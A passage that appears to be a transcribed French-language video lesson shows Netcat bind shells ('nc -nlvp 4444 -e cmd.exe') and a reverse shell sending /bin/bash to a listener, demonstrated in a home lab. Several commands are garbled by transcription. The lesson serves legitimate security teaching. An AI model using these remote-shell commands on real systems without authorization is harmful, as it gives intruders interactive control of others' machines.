L'une des caractéristiques les plus utiles de Netcat est sa capacité à effectuer une redirection de commande. Netcat peut prendre un fichier exécutable et rediriger les messages d'entrée, de sortie et d'erreur vers un port TCP/UDP, plutôt que vers la console par défaut. Pour expliquer cela, considérez l'exécutable command.exe. En clair, on peut relier command.exe à un port local et l'exposer sur le réseau. Toute personne se connectant à ce réseau recevrait donc une invite de commande appartenant à l'ordinateur. Regardons le premier exemple, impliquant par exemple Bob et Alice. C'est ce qu'on appelle communément un bind shell. Voyons en quoi consiste ce scénario. Bob, qui est sous Windows, a demandé de l'aide à Alice, qui est sous Linux. Elle lui a demandé de se connecter à son ordinateur et d'émettre des commandes à distance. Bob a une adresse IP publique, cependant, est derrière une connexion NAT et possède une adresse IP interne. Pour compléter le scénario, Bob doit lier cmd.exe à un port TCP sur son adresse IP publique et demander à Alice de se connecter à cette adresse IP et à ce port particulier. Faisons un petit schéma pour voir de quoi nous parlons. Nous avons Bob, qui a une IP publique, qui est sous Windows, qui veut du dépannage d'Alice, qui est derrière un routeur, qui a donc une adresse IP interne et une adresse IP publique. Pour que Alice puisse se connecter sur Bob, il faut que celui-ci expose le terminal sur son port 4444 afin qu'elle puisse, elle, aller se connecter à lui à l'aide de son adresse IP. Alice tapera donc nc-nv adresse IP le port et Bob, quant à lui, tapera nc-nlvp 4444-e cmd.exe. Essayons de reproduire cet exemple. Sur la machine Windows, et nous avons vu que nous devons taper nc-nlvp 4444-e cmd.exe. La commande a l'air de s'être exécutée normalement. Allons sur l'ordinateur d'Alice maintenant, la machine Linux, et tapons la commande nc-nv 192.168.1.37 sur le port 444 et exécutons cette commande. Nous voyons que nous avons accès au terminal de la machine Windows. Si je fais un dir, j'ai accès à mon dossier Windows. Je ne sais pas si WMI fonctionne sur Windows. WMI, voilà, WinDev, User. Maintenant, deuxième scénario. Alice a besoin de l'aide de Bob. Cependant, Alice n'a aucun contrôle sur le routeur de son bureau et ne peut donc pas transférer le trafic du routeur vers sa machine. Est-ce qu'il y a un moyen pour Bob de se connecter à l'ordinateur d'Alice et de résoudre le problème? La réponse est oui. Ici, nous allons découvrir une autre fonctionnalité utile de Netcat. La possibilité d'envoyer un shell à un hôte distant. Dans cette situation, bien qu'Alice ne puisse pas lier un port à Winbash localement sur son ordinateur et attendre que Bob se connecte, on peut envoyer le contrôle de son bash à la machine de Bob à la place. C'est ce que l'on appelle un reverse shell. Pour que cela fonctionne, Bob doit configurer Netcat pour être en attente d'une connexion. Comme d'habitude, nous utiliserons le port 4444. Maintenant, Alice peut envoyer un shell de sa machine à Bob. Essayons de reproduire ce scénario. Pour ce faire, nous allons sur la machine Windows et nous tapons tout simplement la commande nc-nlvp 4444. Maintenant, allons voir sur la machine Linux ce que nous pouvons faire. Okay.
Dans ce cas-là, nous ferons un C-LV, 192, 168, 137, 44, 44, moins E, slash, pi, slash, bash. J'exécute, et la commande a l'air de s'être bien passée. Allons voir ce qu'il se passe sur la machine Windows. Et apparemment, une connexion a eu lieu. Faisons un petit test. Yes. Ah. Il se pourrait que nous soyons sur une machine Linux. Ou pas mal. Kali. Eh oui. Nous avons donc bien un shell bash. Je vous invite à reproduire tous ces exercices et on se voit pour la suite du cours.